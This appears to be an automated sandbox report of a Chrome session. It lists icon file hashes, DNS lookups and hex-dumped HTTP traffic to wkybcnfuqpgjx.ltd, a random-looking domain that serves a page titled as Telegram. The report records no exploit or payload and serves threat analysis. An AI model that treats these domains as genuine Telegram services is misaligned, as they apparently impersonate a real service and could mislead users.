                                  Preview:.PNG........IHDR.....................PLTEGpL.(...f``.q...oO..rbb..0=..Y..S.jgK.5..l..lxjbR.(^_...l..kD./h...ng.nh66..ki...r..lf..V.q..r..r...l.s.m...r..og..T..V.r..t..s..s..haZZ..PH__...l..h..ULL..................$..$.............. ...........!.....$..%..%....)......... .......#.........%.(...$.%..$.....2$.&.....!..- .. .!....., ..!..w.,...k.....e....."..&.+ .'...........0".......&.WP..('....+......!fUA.D).......-...V.h..$.u.....^.....!.qH..$..1..E..:LF8CC..kd.aZ..#p\A.iF..&D?7...523..$66..."[N?.. . **.|v3..$...{cB......!.;4NO..%.o....X.......H?./"WW.......~....$..B.. TN5.z...7h............SK...B8:\W2..a..S..#.. ..#.......|K.B&.NA.A7..$VB?.|?..Jqg1$"4....q..6*..1..L4+=.......?A.....+`a8.........qn9.YO `....->O:Yi!!..ZO.x..n..3@../c.m."..o;..K..)-I@KXE1s..D=..A../."AQ <..(++.XnZ..,.I~...yu...&..,....5tRNS.c~........5..;!,.e.C.~]...>.....|T._.j....Wbn..m...Q....IDATx...?L.a..qZre8..&..K.6.5m........*)5.jk..j.....B....#...S'..L:.......,79h.{....s.F#qx..w..y.. ..D".H$..D".H$.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):6234
                                  Entropy (8bit):7.94825987093765
                                  Encrypted:false
                                  SSDEEP:96:hyMA790r7NrAIowBCcj8NmBJZomhTSTKrowxZ1zxLE4HFyIksCDvzotNbfAJEuIr:NNrAlwBCcpJZtvoCs6vUzoTfSUMwcW
                                  MD5:DEAA5EC14FB2BB323B1D0E5C4669854D
                                  SHA1:EF463C0265F7DD0E1394F49298ED64D8E1DFB5CD
                                  SHA-256:4F46A96C10AD22CB8BF870EEE898D38124E54E12E83C7DCA448067261D57F7A6
                                  SHA-512:5672CC61AB8C7D055F04ACDE8F50CBD0AB832AA30A4CC4D203F87A1CD65AAD608DA4C683979F6E495AF32548F9695E9FB0A77C984F1DBB343AD85B060B1799B8
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL"k.f..._se...^rp...]qk......k..Zop...Tj.KJ.i...9......k..&cv.Yn.Ujn...eyg......_s....\pg|.p...uy.auq..gr.._s.Xm.pr.YX_........G9........................................,.................)..K...0...0...../...tt8../...-........-.....-.....*..).....'(.....*..%...dc...$.."..... ......................NN.........vw..}".lo!...=?twr.............DD.e%L~yhi..;?.......-1....00......un!.36.....7.%%......_fea]..+1.}..C?.,2...sb.....w..|.. #WT.....n.;nI.02.p....<bw.u.SQ}.......$+aV ..!ZPP.n..h}.......j..Y..e|...gL..,,GF.....aw.. ,Y6w5)...?>.....[q.......C..UjO?....76t+7.......*+w....6.:/..@.$${..._....u..p.*...i.....`..j..`..V..M..D..8c..:..V.. ..Q...RQ...9...UU ........6..........+..:.....E...........)....j.....J.. ..L.........dd..........xy...........q...,tRNS....$68LXcbhj{~~~~..................................IDATx...;K....q.%D.b+.E,(........E... H......E..;..-...y.y..n.m.Z..i:....~w.....B.!..B.!..B.b. )....E..b..<.....X..k...G...I
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4808
                                  Entropy (8bit):7.9343995142958965
                                  Encrypted:false
                                  SSDEEP:96:2/V3QfotGc2noVtO9hs0X+HKHNZK7SVXSowRDpn31vJE+Fh:0AfotFQiOFX+qHmSADR13D
                                  MD5:83C96B32EB1472C164FDA3065DB09692
                                  SHA1:09F1BE24D8ACC2C56A8265EA653E1EE8F5D00F59
                                  SHA-256:6B203D12B0E1C0EB9A10D94D8854AF4C42657D63709F9297032F67FE809B49EF
                                  SHA-512:43C89D2A25EF4DDDCA20FA49D5302C6148D547E12E1CA82FCC951AA9EFCE06E8C0A18FB709CE9717A582C327D0F623CBE0517D3B0625583A8A783F2EBC554A7E
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ea-1f1f9.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.8-.9-..#.T9.!..}.m$...!.S9.=#o%.b.zp&.p&.g..o&.n$.kI=c.zi..e.~d.}m-#r'.p'.q&.Y.rn%.b.zk..j..j .j..].ud.|q&.p'.b.zd.}6iS].uf.~[.sAa&T.m%bG.K3...;kW%\E W@{/%2b.3b..WF&.Z..$~X..$.uO.XG.Z5/_..UD.rL.]8.5%..&.. .>-....X3._:.jD..,.yS.gB...1!.a<'.Y.e@.4#.F5...'Z..C2..(..*.7'.SB.\6.c>...wQ.I9...!|U../_.#}V.L;.@0..4.Q@.9).M=.G8....WF....:+.=,.B2.O>.2"..!..3.-....#..0!x* ....1%.>1.UE.A4..-..!.>$.6+.:*.Q@.B2.)..1'h......./o...YG.5*.TD{".9h..[?..$...M=.:....S9p$..9+.....!../..N.(..G9..?....-+\...".%#V.Ip....{...H7.F*.M-..$.$]}...\..F...Tw.(b..S1.q..PA.....H..ep..+r...3.X@.8).T.h..+|c.P2..*..u..{.&.....k..U..pm.4.y/<x4.U8:a..l!G.C...[kc_..3.7.e7..<[.+.Z\....VAw.C.<..8.k".\|....^.)xWJ~h7{_7tZ&mMZ.t,rT3.aS.oF{e.lG=.hc.|D.h qOBxa].xh..R.l.bC%}Y.oJI.nS.t.gE.\9....4tRNS..ttt..+....'..be<...?...Mzl..........H......w.......Au...CIDATx.....P...Yt...x."82.:....F...J.N....'.#...h.}..%.x.c.....?.....3 .....\|...s ..d2.L&..d2.L....)IU.4-..4U-$.%.o.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5410
                                  Entropy (8bit):7.933774995723551
                                  Encrypted:false
                                  SSDEEP:96:LTtfUkgrrwh/3Q4Gln1whxVrpvtSeSMKwXEDlYnN1XnvGDjW+XwwZBvSeUqPpQb5:fxUkgrrwhI4+n1wh7rpvkeDEJAnuDK+o
                                  MD5:0582218F8A4C622082B5D630787998C7
                                  SHA1:67A567459FB76206E65800D1D9721D09E225BB86
                                  SHA-256:E3F55091BFF7BD8F452B8327BE56B9D54ABAD3CEC9C868FEBD8A84F362EA284D
                                  SHA-512:85885E1F1FC0875751BE58073C7539E1D4140E30DC255BCE1624A742AE64430D95C4433F3B47CF53D211E5384CFEAF9CFEF9400A0763A87F335861EA47A7BC6D
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL..+.Z*L.lh.....b.,___Z42b..h..q..i..i..i..j..a..m.!...\..h..V..j..k..d.....9.Zb.}...g.....m.".u.d`R......a.}b.ym.p.e]]]\\\```aaa,xN_`bFA,}f..l..i.g..d&&&....3D.........###..D........A!!!....2C%.a..*..!#._.....H..J..)..F..>..Q.....?..S...%%%.2C..U..%.!0..O..,.....$..Z........@../."3..L....&7..?..\!.]&.b..N..<..W..(.!...X..&..".):..-.....#p.#.!0.i0.!0.]*.Z).{9...*(%....,=..$.......b....$..........#y.%..#.t6CCD778....0A1.h....!k...."..%...PPP..!..i`..>.o.. ........ ..)].{t.......!h..0/.U.sY.|..G....v...!..=Q.xH.t@.]@.i.(5....'2...[[[.l.....,:.r5....#E....*8P.w..'...-.]$.U5.f.....$l\...$.....g...:.a.#/C.o...../-.c...SC..".....P..9..(.^.....:....6...f.O_O..c0..K.......`}}~.S....*.......Ajjj.'3.{.?.2{.)..A6....%wJ.I..y2..(...JA$=6#.O;trn.+.><.`.?G.....4tRNS.c~..c..2 .8.og...|P.?...b.....~T.R$.a....ss...q.c".....IDATx...{|.e..q=.T.9.(+.9^...s:L..D..A"..MIP#+E@e..k.m.fZ.m%1m..$hj]..5.Z*E{.Hk/.B.@.."W.Ee..yf.4&M....#.$x.....K..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):6156
                                  Entropy (8bit):7.86034145385729
                                  Encrypted:false
                                  SSDEEP:192:CD2Atq5f5zsK2eF3/XLVjpJJK21xMYxfoT9:CD2WwZNjxMYU
                                  MD5:66995F36D6D8F62692F1B9A46D93C2D6
                                  SHA1:9874A4040BBC4C5FE710434A51744CDBBF849E6D
                                  SHA-256:EB0AFA5CD9BFD452DECF8FC4CE70638E1BB5AA5B2E7CE9A2172283BC74C1F435
                                  SHA-512:82E99E2D051FE599FDD21B05C1B002E34CF7C848E128616AD36C2B1C429844606CD00D9B0DC07B32C647F4B0A2A213DF35C8B204A8797E3FA76E54C8563B795C
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.dq.dq.gu.u.............V.n..F.&..6..A......;..&..../....R..Kr.^h.bA.w..)..,`.Mmt0?\9^Z..n.....b...h......t..9..5..,..I.y..Wa<..2..=..L..`.._..m..i..Z..g..Y..Y..k..g..i..e..f..j..e..[..Q..I..@..7.....(..+..8..H..8..#..#.. .."..#..#..#..%..$..%.. ............l..I..c..P..E....M....tD....g.....9.....{...W..^..0..8..D..C..2..=..%Z....z...p..-.....&..!..F..6.."..#..8..H..U..\..R..E..7..*................................................................................... ........#.......W..`..]..L..:..%.. .....!.........nz.jv.gr.ep.bl.]h.Xc.T^.OY.X_.\d.Zb.X^.Z_.Za.Yd.Y_.Ze.Yd.^a..q.........~....t..`..;..B..Sz._.)g.l...................s..x.._l.o~.}..y......I^.o..:.....I...........................................................................}..z..z..y.....tRNS.~.........................................v......5U@%....j......................................................................................................................
                                  No static file info
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jan 12, 2025 01:03:37.879725933 CET192.168.2.61.1.1.10x59c0Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:37.880431890 CET192.168.2.61.1.1.10x95efStandard query (0)www.google.com65IN (0x0001)false
                                  Jan 12, 2025 01:03:38.814745903 CET192.168.2.61.1.1.10x4192Standard query (0)wkybcnfuqpgjx.ltdA (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:38.815193892 CET192.168.2.61.1.1.10x1a80Standard query (0)wkybcnfuqpgjx.ltd65IN (0x0001)false
                                  Jan 12, 2025 01:03:40.694892883 CET192.168.2.61.1.1.10x7442Standard query (0)wkybcnfuqpgjx.ltdA (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:40.695038080 CET192.168.2.61.1.1.10x2253Standard query (0)wkybcnfuqpgjx.ltd65IN (0x0001)false
                                  Jan 12, 2025 01:03:41.951606035 CET192.168.2.61.1.1.10x7dc4Standard query (0)hu.bafanglaicai.appA (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:41.952893972 CET192.168.2.61.1.1.10x81fdStandard query (0)hu.bafanglaicai.app65IN (0x0001)false
                                  Jan 12, 2025 01:03:42.958205938 CET192.168.2.61.1.1.10x8b49Standard query (0)t.meA (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:42.959350109 CET192.168.2.61.1.1.10x45f3Standard query (0)t.me65IN (0x0001)false
                                  Jan 12, 2025 01:03:42.960127115 CET192.168.2.61.1.1.10x5cabStandard query (0)telegram.meA (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:42.960592985 CET192.168.2.61.1.1.10x5c82Standard query (0)telegram.me65IN (0x0001)false
                                  Jan 12, 2025 01:03:43.892787933 CET192.168.2.61.1.1.10xee29Standard query (0)t.meA (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:43.892970085 CET192.168.2.61.1.1.10x84ddStandard query (0)t.me65IN (0x0001)false
                                  Jan 12, 2025 01:03:43.907664061 CET192.168.2.61.1.1.10x7915Standard query (0)telegram.meA (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:43.907906055 CET192.168.2.61.1.1.10xf9d2Standard query (0)telegram.me65IN (0x0001)false
                                  Jan 12, 2025 01:03:43.934813976 CET192.168.2.61.1.1.10xfbfStandard query (0)hu.bafanglaicai.appA (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:43.935034037 CET192.168.2.61.1.1.10x7405Standard query (0)hu.bafanglaicai.app65IN (0x0001)false
                                  Jan 12, 2025 01:03:46.284107924 CET192.168.2.61.1.1.10x1a3Standard query (0)zws2.web.telegram.orgA (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:46.284265995 CET192.168.2.61.1.1.10x42e5Standard query (0)zws2.web.telegram.org65IN (0x0001)false
                                  Jan 12, 2025 01:03:50.205571890 CET192.168.2.61.1.1.10x2ed8Standard query (0)zws2.web.telegram.orgA (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:50.205697060 CET192.168.2.61.1.1.10xac3dStandard query (0)zws2.web.telegram.org65IN (0x0001)false
                                  Jan 12, 2025 01:03:51.785002947 CET192.168.2.61.1.1.10x6b55Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:51.785155058 CET192.168.2.61.1.1.10xb3e0Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                  Jan 12, 2025 01:03:55.141649961 CET192.168.2.61.1.1.10xd65bStandard query (0)zws2-1.web.telegram.orgA (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:55.141803980 CET192.168.2.61.1.1.10xb64cStandard query (0)zws2-1.web.telegram.org65IN (0x0001)false
                                  Jan 12, 2025 01:04:46.324713945 CET192.168.2.61.1.1.10xe353Standard query (0)zws2.web.telegram.orgA (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:04:46.324856997 CET192.168.2.61.1.1.10xe707Standard query (0)zws2.web.telegram.org65IN (0x0001)false
                                  Jan 12, 2025 01:04:50.339332104 CET192.168.2.61.1.1.10x2412Standard query (0)zws2.web.telegram.orgA (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:04:50.339483976 CET192.168.2.61.1.1.10x261cStandard query (0)zws2.web.telegram.org65IN (0x0001)false
                                  Jan 12, 2025 01:04:51.786183119 CET192.168.2.61.1.1.10x1e9dStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:04:51.786333084 CET192.168.2.61.1.1.10x5ca2Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jan 12, 2025 01:03:37.886758089 CET1.1.1.1192.168.2.60x59c0No error (0)www.google.com216.58.206.36A (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:37.887068033 CET1.1.1.1192.168.2.60x95efNo error (0)www.google.com65IN (0x0001)false
                                  Jan 12, 2025 01:03:38.832230091 CET1.1.1.1192.168.2.60x4192No error (0)wkybcnfuqpgjx.ltd172.67.137.41A (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:38.832230091 CET1.1.1.1192.168.2.60x4192No error (0)wkybcnfuqpgjx.ltd104.21.7.183A (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:38.833036900 CET1.1.1.1192.168.2.60x1a80No error (0)wkybcnfuqpgjx.ltd65IN (0x0001)false
                                  Jan 12, 2025 01:03:40.712790012 CET1.1.1.1192.168.2.60x2253No error (0)wkybcnfuqpgjx.ltd65IN (0x0001)false
                                  Jan 12, 2025 01:03:40.713857889 CET1.1.1.1192.168.2.60x7442No error (0)wkybcnfuqpgjx.ltd172.67.137.41A (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:40.713857889 CET1.1.1.1192.168.2.60x7442No error (0)wkybcnfuqpgjx.ltd104.21.7.183A (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:41.986269951 CET1.1.1.1192.168.2.60x81fdNo error (0)hu.bafanglaicai.app65IN (0x0001)false
                                  Jan 12, 2025 01:03:42.010348082 CET1.1.1.1192.168.2.60x7dc4No error (0)hu.bafanglaicai.app104.21.42.79A (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:42.010348082 CET1.1.1.1192.168.2.60x7dc4No error (0)hu.bafanglaicai.app172.67.159.63A (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:42.964962959 CET1.1.1.1192.168.2.60x8b49No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:42.966939926 CET1.1.1.1192.168.2.60x5cabNo error (0)telegram.me149.154.167.99A (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:43.899648905 CET1.1.1.1192.168.2.60xee29No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:43.914695024 CET1.1.1.1192.168.2.60x7915No error (0)telegram.me149.154.167.99A (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:43.973202944 CET1.1.1.1192.168.2.60xfbfNo error (0)hu.bafanglaicai.app172.67.159.63A (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:43.973202944 CET1.1.1.1192.168.2.60xfbfNo error (0)hu.bafanglaicai.app104.21.42.79A (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:43.973481894 CET1.1.1.1192.168.2.60x7405No error (0)hu.bafanglaicai.app65IN (0x0001)false
                                  Jan 12, 2025 01:03:46.304897070 CET1.1.1.1192.168.2.60x1a3No error (0)zws2.web.telegram.org149.154.167.99A (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:50.212141037 CET1.1.1.1192.168.2.60x2ed8No error (0)zws2.web.telegram.org149.154.167.99A (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:51.791810989 CET1.1.1.1192.168.2.60x6b55No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:03:55.150365114 CET1.1.1.1192.168.2.60xd65bNo error (0)zws2-1.web.telegram.org149.154.167.99A (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:04:46.331861973 CET1.1.1.1192.168.2.60xe353No error (0)zws2.web.telegram.org149.154.167.99A (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:04:50.346601009 CET1.1.1.1192.168.2.60x2412No error (0)zws2.web.telegram.org149.154.167.99A (IP address)IN (0x0001)false
                                  Jan 12, 2025 01:04:51.793313026 CET1.1.1.1192.168.2.60x1e9dNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                  Session IDSource IPSource PortDestination IPDestination Port
                                  0192.168.2.64971540.115.3.253443
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:36 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 62 34 58 48 4a 2b 77 70 78 45 36 67 42 2f 36 71 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 35 34 31 33 32 36 63 37 35 30 65 64 64 64 30 0d 0a 0d 0a
                                  Data Ascii: CNT 1 CON 305MS-CV: b4XHJ+wpxE6gB/6q.1Context: 4541326c750eddd0
                                  2025-01-12 00:03:36 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                  2025-01-12 00:03:36 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 62 34 58 48 4a 2b 77 70 78 45 36 67 42 2f 36 71 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 35 34 31 33 32 36 63 37 35 30 65 64 64 64 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 35 41 7a 6f 46 32 68 39 41 6f 44 47 6d 6f 72 76 2f 53 70 54 2b 57 55 51 62 70 2f 49 4a 4c 31 43 62 44 33 6d 38 36 4b 6f 34 61 64 51 46 64 75 2b 31 53 78 66 38 76 7a 4e 6a 57 31 6e 34 7a 65 37 63 6f 44 5a 49 46 66 4d 62 55 4a 63 6a 58 5a 57 2b 70 4d 74 4b 78 61 2f 30 64 33 48 56 43 2b 2f 54 58 2b 75 62 6a 67 33 75 44 67 77
                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: b4XHJ+wpxE6gB/6q.2Context: 4541326c750eddd0<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAR5AzoF2h9AoDGmorv/SpT+WUQbp/IJL1CbD3m86Ko4adQFdu+1Sxf8vzNjW1n4ze7coDZIFfMbUJcjXZW+pMtKxa/0d3HVC+/TX+ubjg3uDgw
                                  2025-01-12 00:03:36 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 62 34 58 48 4a 2b 77 70 78 45 36 67 42 2f 36 71 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 35 34 31 33 32 36 63 37 35 30 65 64 64 64 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: b4XHJ+wpxE6gB/6q.3Context: 4541326c750eddd0<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                  2025-01-12 00:03:36 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                  Data Ascii: 202 1 CON 58
                                  2025-01-12 00:03:36 UTC58INData Raw: 4d 53 2d 43 56 3a 20 50 6f 55 62 36 65 58 6a 6a 30 75 63 42 74 31 47 31 33 55 57 48 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                  Data Ascii: MS-CV: PoUb6eXjj0ucBt1G13UWHA.0Payload parsing failed.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.649724172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:39 UTC660OUTGET / HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  sec-ch-ua-platform: "Windows"
                                  Upgrade-Insecure-Requests: 1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: navigate
                                  Sec-Fetch-User: ?1
                                  Sec-Fetch-Dest: document
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:40 UTC847INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:40 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Sat, 14 Dec 2024 10:26:51 GMT
                                  Vary: Accept-Encoding
                                  cf-cache-status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QQGuqZJmpWONcbV1Lwf8n9sImf1xLVjpLZGZXh55Eo471ylaBr1aTWPxEtEjup0o8pvjJXS9v63MCzlMO%2ByJ4CY%2BUZeFrvRbxhY73v1krNH3G9t1qS9TXF87m62cElidvfghrA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e27f1b8942b8-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=3747&min_rtt=1721&rtt_var=2027&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1238&delivery_rate=1696687&cwnd=234&unsent_bytes=0&cid=1713239a247d8f05&ts=687&x=0"
                                  2025-01-12 00:03:40 UTC522INData Raw: 65 37 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 74 72 61 6e 73 6c 61 74 65 3d 22 6e 6f 22 20 63 6c 61 73 73 3d 22 6e 6f 74 72 61 6e 73 6c 61 74 65 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 65 6c 65 67 72 61 6d 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 65 6c 65 67 72 61 6d 20 69 73 20 61 20 63 6c 6f 75 64 2d 62 61 73 65 64 20 6d 6f 62 69 6c 65 20 61 6e 64 20 64 65 73 6b 74 6f 70 20 6d 65 73 73 61 67 69 6e 67 20 61 70 70 20 77 69
                                  Data Ascii: e7b<!doctype html><html lang="en" translate="no" class="notranslate"><head><meta charset="UTF-8"><title>Telegram</title><meta name="title" content="Telegram"><meta name="description" content="Telegram is a cloud-based mobile and desktop messaging app wi
                                  2025-01-12 00:03:40 UTC1369INData Raw: 65 67 72 61 6d 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 65 6c 65 67 72 61 6d 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 65 6c 65 67 72 61 6d 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 43 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 32 62 35 37 39 37 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 63 6f 6e
                                  Data Ascii: egram"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Telegram"><meta name="application-name" content="Telegram"><meta name="msapplication-TileColor" content="#2b5797"><meta name="msapplication-con
